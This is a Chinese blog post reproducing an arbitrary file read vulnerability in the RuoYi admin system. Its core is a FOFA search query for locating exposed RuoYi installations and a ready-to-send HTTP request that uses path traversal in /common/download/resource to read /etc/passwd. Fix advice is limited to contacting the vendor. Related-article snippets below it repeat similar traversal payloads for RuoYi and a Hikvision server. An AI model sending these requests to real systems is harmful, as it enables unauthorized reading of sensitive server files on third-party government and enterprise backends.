【漏洞复现】若依系统后台任意文件读取漏洞

最新推荐文章于 2024-04-01 14:45:00 发布
最新推荐文章于 2024-04-01 14:45:00 发布
阅读量726 收藏 9
点赞数 12
分类专栏: 【漏洞复现M】 文章标签: java 数据库 开发语言 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/136312875
版权

Nx01 产品简介

        若依系统(RuoYi)是一套基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro,众多政府、企业采用它作为某些系统的权限管理后台,使用率较高。

Nx02 漏洞描述

        若依系统后台存在任意文件读取漏洞,攻击者利用此漏洞获取敏感信息。

Nx03 产品主页

fofa-query: app="RuoYi"

Nx04 漏洞复现

POC:

GET /common/download/resource?resource=/profile/../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=761c2858-f5e3-42e0-a087-dcd9e2880759
Authorization: Basic emthcTp6a2Fx

Nx05 修复建议

建议联系软件厂商进行处理。

晚风不及你ღ
关注
  • 12
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Thinkergod#PeiQi-WIKI-POC#若依管理系统 后台任意文件读取 CNVD-2021-019312
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app="
任意文件读取漏洞复现(CVE-2021-14544)
FODKING的博客
11-22 2827
海康威视流媒体管理服务器任意文件读取(CNVD-2021-14544) 实验工具:burpsuite fodo 实验流程: 实现条件用fodo搜索用海康威视流媒体管理服务器的web端 1.发现它是弱口令直接用弱口令登录 admin 12345 就离谱 发现这应该是一个刚建立的不用的服务器 2.在日志文件中下载一个文件 3.用抓包软件抓取数据包 构建pyload …/…/…/…/…/…/…/windows/system32/drivers/etc/slt 4.发现数据包中存在任意
漏洞挖掘 | ruoyi框架管理系统漏洞
最新发布
2301_80127209的博客
04-01 1132
在挖src的时候,可以通过信息收集收集弱口令,然后通过后台弱口令进入后台:发现一个弱口令进去后:【魔方老师提醒才发现,这个蓝色的草丛其实可以大致判断是若依系统】看这界面,是不是很像ruoyi插件一看:前端vue.js加上登录的cookie rememberMe:【登录失败时bp抓包相应包有remeberMe=delete】得知登录为shiro框架八九不离十后台就是ruoyi框架的管理系统了。
警告 C6011 取消对 NULL 指针“newcode”的引用。
Monkey_cai的博客
05-09 4532
void SListPushBack(SLTNode** pphead, SLTDateType x) { SLTNode* newcode = (SLTNode*)malloc(sizeof(SLTNode)); newcode->data = x; newcode->next = NULL; } 解决方法如下:就下了一个判断语句,是否为空,如果为空就直接退出 void SListPushBack(SLTNode** pphead, SLTDat...
若依系统后台漏洞大全
热门推荐
FY10033的博客
08-07 4万+
漏洞影响范围RuoYi
解决C++中:“取消对NULL指针XXX的引用”的警告提示
weixin_44980842的博客
09-29 4444
在日常的开发中,我们常常会在heap堆区开辟一些内存空间为我所用,你可能会想我手动在heap堆区开辟空间,并在用完之后delete释放空间,这不就完事了吗?可是你有没有想过这样一种case,也即:若此时你的计算机的堆区内存不足,无法给你开辟你想要开辟的空间时,你咋办呢? 幸运的是,其实编译器会给你一个警告warning提示:“取消对NULL指针XXX的引用”的警告提示 比如: 正确的做法是: SingleListNode<T>* newNode = new SingleLis..
MrWQ#vulnerability-paper#若依 CMS 0day 任意文件读取 or 未授权访问1
07-25
文章来源:Khan 安全攻防实验室若依管理系统后台任意文件读取若依管理系统未授权访问。
若依(RuoYi)管理系统 后台任意文件读取
PeiQi的博客
01-29 1万+
若依(RuoYi)管理系统 后台任意文件读取 漏洞描述 若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件 漏洞影响 RuoYi < v4.5.1 FOFA app=“若依-管理系统漏洞复现 登录后台后访问 Url https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/…/…/…/…/etc/passwd 访问后会下载文件 /etc/passwd 可以使用Burp抓
若依漏洞利用方式总结
RisunJan的博客
01-14 1585
声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
实战Src对ruoyi框架管理系统漏洞复现
zkaqlaoniao的博客
12-18 2712
在挖src的时候,搜搜有没有后台弱口令能进去的:发现一个弱口令进去后:【这个蓝色的草丛居然堪比算是ruoyi的指纹】看这界面,是不是很像ruoyi插件一看:前端vue.js加上登录的cookie rememberMe:【登录失败时bp抓包相应包有remeberMe=delete】得知登录为shiro框架八九不离十后台就是ruoyi框架的管理系统了。
代码审计.Springboot(ruoyi).任意文件读取
qq_34012951的博客
02-28 368
1、搜索关键特征2、定位3、复现
【源码】后台管理系统RuoYi(若依)-v4.1.0
12-31
基于SpringBoot的权限管理系统,易读易懂、界面简洁美观。核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用
强大的若依后台管理系统
09-28
她可以用于所有的Web应用程序,如网站管理后台,网站会员中心,CMS,CRM,OA。所有前端后台代码封装过后十分精简易上手,出错概率低。同时支持移动客户端访问。 内置功能 用户管理:用户是系统操作者,该功能主要完成系统用户配置。 部门管理:配置系统组织机构(公司、部门、小组),树结构展现支持数据权限。 岗位管理:配置系统用户所属担任职务。 菜单管理:配置系统菜单,操作权限,按钮权限标识等。 角色管理:角色菜单权限分配、设置角色按机构进行数据范围权限划分。 字典管理:对系统中经常使用的一些较为固定的数据进行维护。 参数管理:对系统动态配置常用参数。 通知公告:系统通知公告信息发布维护。 操作日志:系统正常操作日志记录和查询;系统异常信息日志记录和查询。 登录日志:系统登录日志记录查询包含登录异常。 在线用户:当前系统中活跃用户状态监控。 定时任务:在线(添加、修改、删除)任务调度包含执行结果日志。 代码生成:前后端代码的生成(java、html、xml、sql)支持CRUD下载 。 系统接口:根据业务代码自动生成相关的api接口文档。 在线构建器:拖动表单元素生成相应的HTML代码。 连接池监视:监视当期系统数据库连接池状态,可进行分析SQL找出系统性能瓶颈。
若依后台管理系统 v4.1
09-29
一直想做一款后台管理系统,看了很多优秀的开源项目但是发现没有合适自己的。于是利用空闲休息时间开始自己写一套后台系统。如此有了若依管理系统。她可以用于所有的Web应用程
eyoucms V1.0.4 后台任意文件读取漏洞1
08-03
漏洞简介:易优cms企业建站系统是由php+mysql开发的一套专门用于中小企业网站建设的开源cms。可以用来快速建设一个企业网站( PC,手机,微信都可以访问
solly0880#wiki#若依管理系统 后台任意文件读取 CNVD-2021-019311
07-25
若依(RuoYi)管理系统 后台任意文件读取漏洞描述若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件漏洞影响app=
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
bagecms V3.1.3 后台任意文件读取漏洞1
08-03
漏洞简介:BageCMS是一套基于PHP和MySQL的跨平台的内容管理系统(CMS)。管理功能过滤不严导致任意文件读取漏洞。##漏洞分析在文件 www\prot
nc57-任意文件读取漏洞补丁
06-08
nc57_任意文件读取漏洞补丁
致远oa wpsassistservlet 任意文件读取漏洞
12-27
致远oa wpsassistservlet 任意文件读取漏洞是一种安全漏洞,攻击者可以利用该漏洞读取系统中的任意文件,包括重要的系统文件及用户数据文件。攻击者可以通过该漏洞来获取敏感信息,危害系统安全。 这个漏洞存在的根本原因可能是在致远oa wpsassistservlet中对用户输入的数据没有进行充分的验证和过滤,导致攻击者可以构造恶意请求,获取系统文件的内容。一旦攻击者成功利用这个漏洞,就可能对系统进行攻击,损害系统安全性。 针对致远oa wpsassistservlet 任意文件读取漏洞,我们可以采取一些措施来加强系统安全性。首先,及时更新系统补丁,确保系统能够及时修复这个漏洞。其次,加强对用户输入数据的验证和过滤,限制用户的输入范围,避免攻击者利用恶意输入来进行攻击。另外,加强系统的监控和审计功能,及时发现异常行为,并进行处理。 总的来说,致远oa wpsassistservlet 任意文件读取漏洞是一种严重的安全隐患,需要引起相关部门的重视,采取必要的措施来确保系统安全性。只有不断加强系统安全防护措施,及时修复存在的漏洞,才能有效地提升系统安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值